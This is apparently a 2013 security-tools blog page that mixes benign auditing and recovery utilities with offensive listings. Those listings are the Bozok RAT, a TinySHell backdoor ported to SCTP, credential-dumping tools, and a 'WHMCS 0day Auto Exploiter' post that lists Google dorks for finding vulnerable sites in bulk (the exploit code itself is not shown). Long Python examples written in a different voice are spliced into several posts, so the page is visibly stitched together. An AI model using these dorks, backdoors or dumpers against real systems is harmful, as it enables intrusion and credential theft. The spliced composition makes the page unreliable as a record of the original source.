Saturday 26 October 2013

[Lynis] Security and system auditing tool to harden Linux systems


Lynis is an auditing tool for Unix/Linux (specialists). It scans the system and available software and performs many individual security checks. It determines the hardening state of the machine and detects security issues. Besides security-related information it also scans for general system information, installed packages and possible configuration errors.

This software aims to assist automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read-only storage is possible (USB stick, CD/DVD).

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits.

Intended audience: security specialists, penetration testers, system auditors, system/network managers.

Examples of audit tests:
  • Available authentication methods
  • Expired SSL certificates
  • Outdated software
  • User accounts without password
  • Incorrect file permissions
  • Configuration errors
  • Firewall auditing

Bozok RAT 1.4.3



Changelog:
-fixed socket timeout bug
-fixed small translation bugs
-added spanish/arabic/bulgarian/polish/french translation
-added "Test Connection" in builder


[SterJo Key Finder v.1.6] Tool to recover lost product keys


SterJo Key Finder is a small and FREE application that can recover lost product keys. All you have to do is run the program and it will find the keys for you in a few seconds. The software is currently able to recover a large number of keys, such as Microsoft Windows, Microsoft Office, WinZip, Corel Draw, CyberLink PowerDVD, Nero, VMWare Workstation, Techsmith Camtasia Studio, AUTOCAD and many more...

After recovery is done, the user can also save the keys to a text file and use them when the system has to be reinstalled.


[Outlook Password Dump] Tool to quickly recover lost email passwords from all versions of Microsoft Outlook


Outlook Password Dump is the free command-line tool to quickly recover lost email passwords from all versions of Microsoft Outlook.

Outlook stores passwords for all the mail accounts configured on your system. These passwords are stored in encrypted form, and only the respective user can decrypt them.

Outlook Password Dump helps you to instantly decrypt and recover all these stored mail passwords.

It can also decrypt passwords from the different types of email account configurations supported by Outlook, such as

  • IMAP
  • POP3
  • SMTP
  • LDAP
  • HTTP

You can choose to dump the passwords to the console or write them to a file. Being a command-line tool makes it ideal for penetration testers and forensic investigators.

It can recover passwords from all versions of Outlook, from 'Outlook Express' to the latest version, 'Outlook 2013'.


[Mellivora] Basic database driven CTF engine


Mellivora is a basic database driven CTF engine written in PHP.

Requirements

  • LAMP: PHP 5.3+, MySQL 5.5+, Apache 2.2+. May work with other configurations but this is untested.

Installation

  • Download to any directory, say: "/var/www/mellivora/".
  • Create an Apache VHost and point DocumentRoot to "htdocs/". An example Apache config can be found in the "install/" directory.
  • Create a database and import the structure from "install/db.sql".
  • Edit "config.inc.php" and "db.inc.php" in "config/".
  • Make the "writable/" directory and subdirectories writable by Apache.

[Web-Sorrow v1.5] Versatile security scanner for the information disclosure and fingerprinting phases of pentesting


Web-Sorrow is a Perl based tool for misconfiguration, version detection, enumeration, and server information scanning. It's entirely focused on enumeration and collecting info on the target server. Web-Sorrow is a "safe to run" program, meaning it is not designed to be an exploit or perform any harmful attacks.

Web Services: a CMS and its version number, social media widgets and buttons, hosting provider, CMS plugins, and favicon fingerprints

Authentication areas: logins, admin logins, email webapps

Bruteforce: Subdomains, Files and Directories

Stealth: with -ninja you can gather valuable info on the target with as few as 6 requests, with -shadow you can request pages via google cache instead of from the host

AND MORE: Sensitive files, default files, source disclosure, directory indexing, banner grabbing (see below for full capabilities)

[Wi-Fi Password Key Generator] Wireless WEP/WPA/WPA2 Security Key Maker Tool


WiFi Password Key Generator is the free desktop tool to quickly create secure Wireless WEP/WPA/WPA2 keys.

Most devices (modems/routers) require you to enter WEP/WPA keys during wireless security configuration. Unlike regular passwords, these keys have strict length requirements based on the type of security mechanism (WEP, WPA, WPA2 etc).

In such cases, 'Wi-Fi Password Key Generator' can help you to easily generate these keys. It supports all types of wireless security configurations (WEP, WPA, WPA2) and the key length combinations shown below:

  • WEP - 64-bit - 5 Characters
  • WEP - 128-bit - 13 Characters
  • WEP - 152-bit - 16 Characters
  • WEP - 256-bit - 29 Characters
  • WPA - 64-bit - 8 Characters
  • WPA2 - 160-bit - 20 Characters
  • WPA2 - 504-bit - 63 Characters

It generates secure wireless keys using a combination of lowercase letters, uppercase letters, numbers and special symbols.

The generated key is also displayed in both ASCII and HEX format, so you can copy whichever form your wireless device asks for.

The tool is very easy to use, and anyone can generate a secure Wi-Fi key within seconds with a few clicks.
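The length table and the ASCII/HEX display above are the whole substance of such a generator, so here is an added Python example (not the tool's own code) that produces keys of exactly those lengths from a CSPRNG, shows the HEX form a router may ask for, and validates a candidate key the way firmware does. The symbol set is an assumption (a conservative subset of printable ASCII), and the "bit" labels follow the tool's table; for WEP that figure includes the 24-bit IV, which is why a "64-bit" WEP key is only 5 secret bytes (10 hex digits).

```python
import secrets
import string

# Key lengths from the table above: (security type, advertised bits) -> ASCII length.
# For WEP the advertised size includes the 24-bit IV, so a "64-bit" WEP key is
# 5 secret bytes = 10 hex digits.
KEY_LENGTHS = {
    ("WEP", 64): 5, ("WEP", 128): 13, ("WEP", 152): 16, ("WEP", 256): 29,
    ("WPA", 64): 8, ("WPA2", 160): 20, ("WPA2", 504): 63,
}

# Printable ASCII minus space, quotes and backslash, which some router UIs mangle
# (assumption: a conservative symbol set, not the tool's exact alphabet).
SYMBOLS = "!#$%&()*+,-./:;<=>?@[]^_{|}~"
CLASSES = (string.ascii_lowercase, string.ascii_uppercase, string.digits, SYMBOLS)
ALPHABET = "".join(CLASSES)


def generate_key(security, bits):
    """Generate a key of the exact length the security type requires, drawn from a
    CSPRNG, containing at least one character from every class."""
    length = KEY_LENGTHS[(security, bits)]
    while True:
        key = "".join(secrets.choice(ALPHABET) for _ in range(length))
        # Shortest key is 5 characters, so rejection sampling terminates quickly.
        if all(any(c in cls for c in key) for cls in CLASSES):
            return key


def to_hex(key):
    """HEX form of an ASCII key, for devices that want a hex key rather than a passphrase."""
    return key.encode("ascii").hex().upper()


def check_key(security, bits, key):
    """Validate a key the way a router's firmware would: exact length for the
    type, printable ASCII only, and 8..63 characters for WPA/WPA2 passphrases."""
    expected = KEY_LENGTHS.get((security, bits))
    if expected is None or len(key) != expected:
        return False
    if any(c not in ALPHABET for c in key):
        return False
    if security.startswith("WPA") and not 8 <= len(key) <= 63:
        return False
    return True


if __name__ == "__main__":
    for sec, bits in KEY_LENGTHS:
        k = generate_key(sec, bits)
        print(f"{sec}-{bits}: {k}  hex={to_hex(k)}")
```

The 63-character WPA2 passphrase is the one worth defaulting to: it is the longest the standard allows, and a random string of that length is far outside any dictionary or mutation attack, whereas the 8-character WPA minimum only resists casual guessing.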

[SterJo Wireless Passwords v.1.4] Utility for recovering your lost wireless passwords of your network

SterJo Wireless Passwords is a FREE utility for recovering the lost wireless passwords of your network.

As the number of devices using the wireless network grows, so does the need for more security, and a password made of letters, numbers and special characters can easily be forgotten over time. Instead of resetting everything and creating a new password, there is a much simpler solution.

All you have to do is run SterJo Wireless Passwords and allow it to scan your wireless network. The software displays all passwords saved by the Wireless Zero Configuration or WLAN AutoConfig service, which can then be used to connect your other wireless devices without fear of forgetting them in the future.

[Doona] Network Protocol Fuzzer

Doona is a fork of the Bruteforce Exploit Detector (BED); it was renamed to avoid confusion, as it has a large number of changes. You should get a copy from GitHub if you want to try it: https://github.com/wireghoul/doona.

It's currently a little short on documentation, so I will let the changelog detail some of the many differences between Doona and BED:

[ 0.7 ]

- resolved the need for a hardcoded plugin list
- added max requests option to allow parallel execution (easier than hacking in thread support)
- added sigpipe handler to prevent silent exit if server unexpectedly closes the connection
- added http proxy module
- added more ftp test cases
- added more rtsp test cases
- added more http test cases
- added more irc test cases
- fixed a long standing BED bug where two test strings were accidentally concatenated
- fixed a long standing BED bug where a hex representation of a 32bit integer was not max value as intended
- aliased -m to -s (-s is getting deprecated/reassigned)
- renamed plugins to modules (-m is for module)
- removed directory traversal testing code from ftp module
- rewrote/broke misc testing procedure to test specific edge cases, needs redesign
- added support for multiple setup/prefix/verbs, ie: fuzzing Host headers with GET/POST/HEAD requests
- fixed long standing BED bug in the smtp module where it wouldn't greet the mail server correctly with HELO
- added more smtp test cases
- fixed long standing BED bug in escaped Unicode strings
- added more large integer and formatstring fuzz strings
- fixed column alignment in the progress output

[Binwalk v1.2.2] Firmware Analysis Tool



Binwalk is a firmware analysis tool designed to assist in the analysis, extraction, and reverse engineering of firmware images and other binary blobs. It is simple to use, fully scriptable, and can be easily extended via custom signatures, extraction rules, and plugin modules.

Binwalk supports various types of analysis useful for inspecting and reverse engineering firmware, including:
  • Embedded file identification and extraction
  • Executable code identification
  • Type casting
  • Entropy analysis and graphing
  • Heuristic data analysis
  • "Smart" strings analysis
Binwalk's file signatures are (mostly) compatible with the magic signatures used by the Unix file utility, and include customized/improved signatures for files that are commonly found in firmware images such as compressed/archived files, firmware headers, kernels, bootloaders, filesystems, etc. 
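Entropy analysis is the one item in the list above that a signature database cannot replace: compressed or encrypted sections carry no magic bytes, but they stand out as sustained runs near 8 bits per byte. The following is an added Python example (not Binwalk's code) of the per-block Shannon entropy profile such tools graph, plus a region finder that turns the profile into byte ranges an analyst would inspect for a decompression or decryption step. The sample image is constructed inline with a fixed seed; the block size and 7.5-bit threshold are assumptions.

```python
import math
import random


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte: 0.0 for constant data,
    8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def entropy_profile(blob, block=1024):
    """Per-block entropy values in file order; this is the series a tool would graph."""
    return [shannon_entropy(blob[i:i + block]) for i in range(0, len(blob), block)]


def high_entropy_regions(blob, block=1024, threshold=7.5):
    """Byte ranges (start, end) of consecutive blocks at or above the threshold.
    Sustained values near 8 bits/byte mark compressed or encrypted payloads,
    which is exactly where a signature scan finds nothing and the analyst
    should look for the decompression or decryption routine instead."""
    regions, start = [], None
    for idx, e in enumerate(entropy_profile(blob, block)):
        offset = idx * block
        if e >= threshold and start is None:
            start = offset
        elif e < threshold and start is not None:
            regions.append((start, offset))
            start = None
    if start is not None:
        regions.append((start, len(blob)))
    return regions


def build_sample():
    """Constructed stand-in for a firmware image: a plaintext header padded with
    zeros, a 4 KiB pseudo-random payload (standing in for an encrypted or
    compressed section) and zero padding. Fixed seed so results are repeatable."""
    rng = random.Random(1234)
    header = b"FIRMWARE v1.0 model=EXAMPLE\n".ljust(2048, b"\x00")
    payload = bytes(rng.getrandbits(8) for _ in range(4096))
    trailer = b"\x00" * 2048
    return header + payload + trailer


def scan_file(path, block=1024, threshold=7.5):
    """Run the same analysis over a real file on disk."""
    with open(path, "rb") as fh:
        return high_entropy_regions(fh.read(), block, threshold)


if __name__ == "__main__":
    blob = build_sample()
    for i, e in enumerate(entropy_profile(blob)):
        print(f"0x{i * 1024:06x}  {e:5.2f} " + "#" * int(e * 4))
    print("high-entropy regions:", high_entropy_regions(blob))
```

A block size of 1 KiB is small enough to locate boundaries to within a sector but large enough that 256 symbols get a fair sample; with much smaller blocks the estimate is biased low even for truly random data, so the threshold would have to drop with it.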

Monday 21 October 2013

[Facebook Password Decryptor v5.5] Facebook Password Recovery Software


Facebook Password Decryptor is the FREE software to instantly recover Facebook account passwords stored by popular web browsers and messengers.

It is one of our most popular tools, with over one million downloads worldwide.

Here is the complete list of supported applications:
  • Internet Explorer (v4.0 - v10.0)
  • Firefox
  • Google Chrome
  • Chrome Canary/SXS
  • CoolNovo Browser
  • Opera Browser
  • Apple Safari
  • Flock Browser
  • Comodo Dragon Browser
  • SeaMonkey Browser
  • Paltalk Messenger
  • Miranda Messenger

It is very easy to use and particularly useful for penetration testers and forensic investigators.

For command-line version, check out our new tool - Facebook Password Dump.

[SterJo Startup Patrol v.1.3] Disable software that delayed the boot time


It may often happen that your PC runs a little slower than usual. Don't worry, it is nothing serious. You've probably installed some software that delays the boot time.

SterJo Startup Patrol allows you to view those files and disable them. This way you can optimize the Windows startup time, but be careful not to disable crucial programs you are using. By blocking those unneeded files the system will definitely run faster and smoother.

The software constantly tracks new or modified startup registry entries and notifies you if any changes appear.

If any application tries to add a startup registry entry to your system, the software displays the application with the following information: Section, Product Name, Product Description, Company, Version and Process Path.

Using the displayed information, the user can disable or delete the unwanted program and prevent it from running automatically.

[TinySHell] Ported to SCTP


You may have seen, a while ago, my post on SCTP reverse shells.

I realized quite quickly that I should definitely do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use an SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. The connection is also encrypted.

The backdoor in question is ‘TinySHell’ by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later.

Anyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it!


[IPv6 Disable Tool] Command-line Software to Enable or Disable IPv6 on Windows


IPv6 Disable is the free command-line tool to quickly Enable or Disable IPv6 (Internet Protocol version 6) on your Windows system.


It automatically checks the current status of IPv6 and then enables/disables it accordingly.

It is a simple and easy-to-use tool. Also, being a command-line based tool makes it perfect for automation and for use on remote systems.

WHMCS 0day Auto Exploiter <= 5.2.8


inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:"Powered by WHMCompleteSolution"
intext:"Powered by WHMCompleteSolution" inurl:clientarea.php
inurl:announcements.php intext:"WHMCompleteSolution"
intext:"Powered by WHMCS"


Here is the PHP code that you must save as WHMCS-Fucker.php:

[Ghiro v0.1] Digital Image Forensic Analyzer

Sometimes forensic investigators need to process digital images as evidence. There are some tools around; without them, forensic analysis involving a lot of images is difficult. Images contain tons of information; Ghiro extracts this information from the provided images and displays it in a nicely formatted report.

Dealing with tons of images is pretty easy, as Ghiro is designed to scale to gigabytes of images.

All tasks are fully automated: you just have to upload your images and let Ghiro do the work.

Understandable reports and great search capabilities allow you to find a needle in a haystack.

Ghiro is a multi-user environment; different permissions can be assigned to each user. Cases allow you to group image analyses by topic, and you can choose which users are allowed to see your case with a permission schema.

Ghiro can be used in many scenarios: forensic investigators could use it on a daily basis in their analysis lab, but anyone interested in uncovering secrets hidden in images could also benefit. Some use case examples are the following:
  • If you need to extract all data and metadata hidden in an image in a fully automated way
  • If you need to analyze a lot of images and do not have much time to read the reports for all of them
  • If you need to search a bunch of images for some metadata
  • If you need to geolocate a bunch of images and see them on a map
  • If you have a hash list of "special" images and you want to search for them

[SterJo Task Manager v.2.6] Advanced utility for process managing


SterJo Task Manager is a FREE advanced utility for process management which lets you get details on everything that's running on your computer.

The program is divided into several sections covering the main parts of the system. "Processes" gives you more details about all processes and can also show the CPU usage of each process, with an option to terminate it and recover the speed of the computer.

If the startup of your system is significantly slower than it used to be, the reason is probably too many applications stored in the boot sequence. The "Registry" section can take care of this and exclude all those unnecessary things in order to speed up the startup. This way you can optimize the Windows startup time, but be careful not to disable crucial programs you are using. The "Services" section shows Windows and non-Windows services with the ability to stop, pause or delete them.

The main thing that distinguishes this software from the standard Windows Task Manager is the "Connections" section. Here you can see all processes that reach out to the internet, which can be quite useful for various analyses and increases your safety.

[AxCrypt] Open Source Windows File Encryption Software



AxCrypt is the leading open source Windows file encryption software. It integrates seamlessly with Windows to compress, encrypt, decrypt, store, send and work with individual files.

Personal Privacy and Security with AES-128 File Encryption and Compression for Windows 2000/2003/XP/Vista/2008/7. Double-click to automatically decrypt and open documents. Store strong keys on removable USB-devices.

Features
  • Password Protect any number of files using strong encryption.
  • Right-click integration with Windows Explorer makes AxCrypt the easiest way to encrypt individual files in Windows.
  • Double-click integration makes it as easy to open, edit and save protected files as it is to work with unprotected files.
  • Many additional features, but no configuration required. Just install it and use it.
  • AxCrypt encrypts files that are safely and easily sent to other users via e-mail or any other means. Self-decrypting files are also supported, removing the need to install AxCrypt to decrypt.
  • AxCrypt is translated into English, Danish, Dutch, French, German, Hungarian, Italian, Norwegian, Russian, Polish, Spanish and Swedish so chances are it speaks your preferred language.
AxCrypt is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation.

Read more here


[FruityWifi v1.0] Wireless network auditing tool


FruityWifi is a wireless network auditing tool based on the WiFi Pineapple. The application can be installed on any Debian-based system by adding the extra packages. Tested on Debian, Kali Linux, Kali Linux ARM (Raspberry Pi) and Raspbian (Raspberry Pi).



Services
  • Wireless: Start|Stop wireless access point. (hostapd)
  • Supplicant: Connects to the internet using a wireless interface
  • Karma: REF: http://www.digininja.org/karma/
  • URL Snarf: Start|Stop urlsnarf
  • URL Spoof: Start|Stop urlsnarf
  • Kismet: Start|Stop kismet
  • Squid: Start|Stop squid3
  • sslstrip: Start|Stop sslstrip

[Router Password Decryptor] Tool to Recover Login/PPPoE/WEP/WPA/WPA2 Passwords from Router/Modem Config file


Router Password Decryptor is the FREE tool to instantly recover internet login/PPPoE authentication passwords, wireless WEP keys and WPA/WPA2 passphrases from your router/modem configuration file.

Currently it supports password recovery from the following types of routers/modems:

  • Cisco
  • Juniper
  • DLink
  • BSNL

In addition, it has a unique 'Smart Mode' feature (experimental) to recover passwords from any type of router/modem configuration file. It detects the various password fields in such a config file (XML only) and then automatically tries to decrypt those passwords.

It also has a quick link to a Base64 decoder, which is useful when you have found a Base64-encoded password (ending with =) in the config file and automatic recovery is not working.

It is a very easy-to-use tool with a cool GUI. Administrators and penetration testers will find it useful for recovering login passwords as well as wireless keys from router configuration files.

Monday 14 October 2013

[SterJo NetStalker v.1.0] Security software able to detect all authorized and unauthorized connections


SterJo NetStalker is innovative and FREE security software able to detect all authorized and unauthorized connections to your computer and send you an alert for each new connection.

The software is based on principles similar to those most firewalls use, and can also create custom security policies, with the advantage of running fully portable. It serves as an entry point into your computer and instantly informs you about all the processes able to establish a connection with an external network.

Where an analysis of all open ports on your system with a standard port scanner would take a few minutes, this program does it in a few milliseconds. It is also quite powerful software for analysing all running processes on your system, including those that look suspicious.

The program offers an option to display details about all connections and to close an individual connection or an entire process.

If you are one of those who want to know exactly where your connections are targeted, then this program is the ideal solution for you.


Saturday 12 October 2013

Nmap CheatSheet



[Firebind Reflector v0.53] Portable Network Path Scanning Tool


Firebind Reflector is a portable network path scanning tool that can profile firewall and other network device rules for port blocking, such as performing egress/exfiltration testing. Reflector has a client side and a listener (server side) like Netcat and Ncat, except Reflector can dynamically be told by the client to listen on any or all 65,535 TCP or UDP ports, while supporting up to several hundred simultaneous client scans.


  • All components of Reflector (server-side and client-side) are contained within a single 3 megabyte Java jar file. The Reflector jar file contains the core Firebind codebase, a fully functional web server, and both Reflector Java applet and command line clients.
  • Reflector's Java applet is automatically downloaded to the client machine, requiring no user installation other than allowing it to run within the browser. Since it is browser-based, any user, no matter how non-technical, can run a test.
  • Reflector's patent pending technology (System and Method for Network Path Validation – US 20130185428) allows Reflector to dynamically listen on any UDP or TCP port, while never exceeding operating system limits that restrict the maximum number of listeners (which can be as low as several hundred at a time out of 65,535 possible ports for either TCP or UDP).
  • Reflector's out-of-band command channel allows all clients to keep in sync with the Reflector server component regardless of whether the given port under test is blocked or not, giving Reflector 100% accuracy in results. Other client-only solutions can't guarantee that the packets they receive back are coming from the device they are trying to profile or test. The out-of-band command channel also allows a single instance of Reflector to handle hundreds of simultaneous clients, all performing full 64k TCP and/or UDP port tests. Finally, the out-of-band command channel increases the speed of the tests, since the client can be configured to wait any number of seconds for a reply, and if that timer expires, the client can issue a "skip" command to Reflector to tell it to move to the next port.
  • Reflector does more than simple TCP handshake connection attempts: it sends a custom payload over every port and checks whether the payload echoed back from the server matches.
  • Reflector's built-in database and RESTful API allow test results to be viewed via a web page or accessed by third-party applications. This removes the burden from the client-side user to e-mail their results.

[WiFi Password Dump] Command-line Tool to Recover Wireless Passwords



WiFi Password Dump is the free command-line tool to quickly recover all the wireless account passwords stored on your system.

It automatically recovers all types of wireless keys/passwords (WEP/WPA/WPA2 etc) stored by the Windows Wireless Configuration Manager.

For each recovered WiFi account, it displays the following information:
  • WiFi Name (SSID)
  • Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
  • Password Type
  • Password in Hex format
  • Password in clear text

Being a command-line tool makes it useful for penetration testers and forensic investigators. For the GUI version check out the Wi-Fi Password Decryptor.


[Mutator v0.2.2.1] Wordlist mutator



This project aims to be a wordlist mutator with hormones, which means that some
mutations will be applied to the result of the ones that have already been done,
resulting in something like:

corporation -> C0rp0r4t10n_2012

This software is useful when applied to a few words, like the company name and/or
the targeted domain name, or the usernames of the system administrators. You must
bear in mind that the number of words resulting from applying all mutations is
exponential: a 1 word input would generate an output of 1200 words; a 4 word input would
generate an output of 4800 words.

The mutations currently supported are:
* Case mutations (toUpper, toLower, FirstCharUpper, SwapCase)
* T0 l33t mutation
* Add Special Char mutation
* Append String from a predefined list
* Append Date

Some mutations are strange, and some of them make no sense applied together,
like *_strings and add_year, but that is your decision; that is what the
parameters exist for xDDD

The mutation "prepend_string" is commented out because IMHO it makes no sense xD and
it is rare to find passwords like this, but feel free to uncomment it, and don't
forget to uncomment it in mutator.h too

Syntax: mutator [options] wordlist

Options:
  -v, --version        Show version information
  -h, --help           Show this help
  -o, --output [file]  File to write the results
  -f, --file [file]*   File from which to read the words
  -w, --word [word]*   Word to mutate
  -b, --basic          Only "case" and "l33t" mutations
  -a, --advanced       Only advanced mutations
  -y, --years=[year]   No append/prepend year; if a year is specified, append the range between the specified year and the current year; you can specify a range as well [year-year]
  -x, --specials       No append special chars
  -s, --strings        No append/prepend hardcoded strings

One of the options -w or -f is required

Use Case:

$ ./mutator -w company -o company.dic

$ for i in $(cat user.dic); do ./mutator -w $i -o $i.dic; done
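The "mutator with hormones" idea (each mutation applied on top of the previous ones) is easiest to see in code, and its defensive counterpart is a password-policy check that rejects exactly the derivatives such a wordlist would try first. The following added Python example (not Mutator's code) implements the case, l33t, special-char, predefined-string and append-year stages in that chained order and uses the resulting set as a policy check; the substitution table, special characters and string list are assumptions, since Mutator's own lists are not on the page.

```python
import datetime

# Mutation tables: assumptions, not Mutator's own lists.
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"}
SPECIALS = ("!", "@", "#", "$", "_")
STRINGS = ("admin", "pass", "123")


def case_mutations(word):
    """toLower, toUpper, FirstCharUpper and SwapCase variants."""
    return {word.lower(), word.upper(), word.capitalize(), word.swapcase()}


def leet(word):
    """T0 l33t: substitute vowels and 's' regardless of case."""
    return "".join(LEET.get(c.lower(), c) for c in word)


def mutations(word, year_from=2000, year_to=None):
    """Chained derivative set: case variants first, l33t applied on top of
    each, then specials, predefined strings and years appended to every
    result so far (this is the 'hormones' behaviour: later stages feed on
    the output of earlier ones)."""
    year_to = year_to or datetime.date.today().year
    base = set()
    for w in case_mutations(word):
        base.add(w)
        base.add(leet(w))
    out = set(base)
    years = [str(y) for y in range(year_from, year_to + 1)]
    for w in base:
        for s in SPECIALS:
            out.add(w + s)
        for s in STRINGS:
            out.add(w + s)
        for y in years:
            out.add(w + y)
            out.add(w + "_" + y)
    return out


def is_derived_from(candidate, base_words, **year_range):
    """Password-policy check: True when the candidate is a mutation of any base
    word (company name, domain, admin usernames), i.e. a password that a
    mutated wordlist would recover almost immediately."""
    return any(candidate in mutations(w, **year_range) for w in base_words)


if __name__ == "__main__":
    derived = mutations("corporation", year_from=2010, year_to=2013)
    print(len(derived), "derivatives; sample:", sorted(derived)[:8])
    print(is_derived_from("C0rp0r4t10n_2012", ["corporation"], year_from=2010, year_to=2013))
```

Because the check materialises the whole derivative set per base word, it is meant for a handful of base words (company, domain, admin names), which is also the input size the README recommends for the generator itself.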

[Browser Password Decryptor v5.5] Software to instantly recover website login passwords stored by popular web browsers


Browser Password Decryptor is the FREE software to instantly recover website login passwords stored by popular web browsers.

Currently it can recover saved login passwords from the following browsers:
  • Firefox
  • Internet Explorer
  • Google Chrome
  • Google Chrome Canary/SXS
  • CoolNovo Browser
  • Opera Browser
  • Apple Safari
  • Comodo Dragon Browser
  • SeaMonkey Browser
  • Flock Browser

For the command-line version, check out our new tool - Browser Password Dump.

Features:
  • Instantly decrypt and recover stored encrypted passwords from popular web browsers.
  • Right-click context menu to quickly copy the password.
  • Recover passwords of any length and complexity.
  • Automatically discovers all supported applications and recovers all the stored passwords.
  • Sort feature to arrange the recovered passwords in various orders, to make it easier to search through hundreds of entries.
  • Save the recovered password list to an HTML/XML/Text file.
  • Easier and faster to use with its enhanced user-friendly GUI.
  • Support for local installation and uninstallation of the software.


[LinEnum v0.2] Automating local information gathering tasks on Linux hosts


LinEnum is a shell script that automates local information gathering tasks on Linux hosts. Over 65 checks are performed, obtaining anything from kernel information to locating possible escalation points such as potentially useful SUID/GUID files and Sudo/rhost mis-configurations etc.

Additionally, the script will also use a provided keyword to search through *.conf and *.log files. Any matches will be displayed along with the full file path and line number on which the keyword was identified (useful for finding 'password' and other sensitive data).



High-level summary of the checks/tasks performed by LinEnum:
  • Kernel and distribution release details
  • System Information:
    • Hostname
    • Networking details:
    • Current IP
    • Default route details
    • DNS server information
  • User Information:
    • Current user details
    • Last logged on users
    • List all users including uid/gid information
    • List root accounts
    • Checks if password hashes are stored in /etc/passwd
    • Extract full details for 'default' uids such as 0, 1000, 1001 etc
    • Attempt to read restricted files i.e. /etc/shadow
    • List current user's history files (i.e. .bash_history, .nano_history etc.)
    • Basic SSH checks
  • Privileged access:
    • Determine if /etc/sudoers is accessible
    • Determine if the current user has Sudo access without a password
    • Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.)
    • Is root's home directory accessible
    • List permissions for /home/
  • Environmental:
    • Display current $PATH
  • Jobs/Tasks:
    • List all cron jobs
    • Locate all world-writable cron jobs
    • Locate cron jobs owned by other users of the system
  • Services:
    • List network connections (TCP & UDP)
    • List running processes
    • Lookup and list process binaries and associated permissions
    • List inetd.conf/xinetd.conf contents and associated binary file permissions
    • List init.d binary permissions
  • Version Information (of the following):
    • Sudo
    • MYSQL
    • Postgres
    • Apache
    • Checks user config
  • Default/Weak Credentials:
    • Checks for default/weak Postgres accounts
    • Checks for default/weak MYSQL accounts
  • Searches:
    • Locate all SUID/GUID files
    • Locate all world-writable SUID/GUID files
    • Locate all SUID/GUID files owned by root
    • Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc)
    • List all world-writable files
    • Find/list all accessible *.plan files and display contents
    • Find/list all accessible *.rhosts files and display contents
    • Show NFS server details
    • Locate *.conf and *.log files containing keyword supplied at script runtime
    • List all *.conf files located in /etc
    • Locate mail
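Several of the LinEnum searches above (password hashes in /etc/passwd, world-writable files, SUID/GUID files and their intersection) are the same checks Lynis lists earlier on this page as audit tests ("user accounts without password", "incorrect file permissions"), and they are what a hardening baseline should fail on before any attacker-side script finds them. The following added Python example (neither project's code) implements those checks as a local audit: it parses shadow/passwd-style text for empty password fields and for hashes stored in the world-readable file, and walks a directory tree classifying files by SUID/SGID and world-writable mode bits. The sample account lines are constructed, and the demo tree is created in a temporary directory so it runs anywhere; run find_risky_files("/") as root for a real audit.

```python
import os
import stat
import tempfile

# Values in the password field that mean "no usable password here": shadow
# marker ('x') or a locked account.
LOCKED = {"*", "!", "!!", "x"}


def accounts_without_password(shadow_text):
    """Usernames whose shadow password field is empty: anyone can log in as
    them without a password. Locked ('!', '*', '!!') accounts are skipped."""
    hits = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] and fields[1] == "":
            hits.append(fields[0])
    return hits


def passwd_field_issues(passwd_text):
    """Entries in /etc/passwd whose password field is neither the 'x' shadow
    marker nor a lock: a hash sitting in a world-readable file, or an empty
    field (no password at all). Returns (user, 'hash'|'empty') pairs."""
    issues = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        if fields[1] == "":
            issues.append((fields[0], "empty"))
        elif fields[1] not in LOCKED:
            issues.append((fields[0], "hash"))
    return issues


def find_risky_files(root):
    """Walk root and classify regular files by mode bits: SUID/SGID files,
    world-writable files, and the dangerous intersection of the two (a
    privileged binary anyone can overwrite). Paths are relative to root."""
    result = {"suid_sgid": [], "world_writable": [], "ww_suid_sgid": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; not fatal for an audit
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(path, root)
            privileged = bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))
            writable = bool(st.st_mode & stat.S_IWOTH)
            if privileged:
                result["suid_sgid"].append(rel)
            if writable:
                result["world_writable"].append(rel)
            if privileged and writable:
                result["ww_suid_sgid"].append(rel)
    for key in result:
        result[key].sort()
    return result


# Constructed sample account files (not from any real host).
SAMPLE_SHADOW = """root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
guest::19000:0:99999:7:::
svc:!!:19000:0:99999:7:::
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
legacy:$1$abc$xyz:1001:1001::/home/legacy:/bin/sh
nopw::1002:1002::/home/nopw:/bin/sh
"""


def build_demo_tree():
    """Create a throwaway directory with one file per case and return its path."""
    root = tempfile.mkdtemp(prefix="audit-demo-")
    for name, mode in (("bin_setuid", 0o4755), ("tmp_ww", 0o666),
                       ("bad_setuid_ww", 0o4777), ("normal", 0o644)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    print("no password:", accounts_without_password(SAMPLE_SHADOW))
    print("passwd issues:", passwd_field_issues(SAMPLE_PASSWD))
    print(find_risky_files(build_demo_tree()))
```

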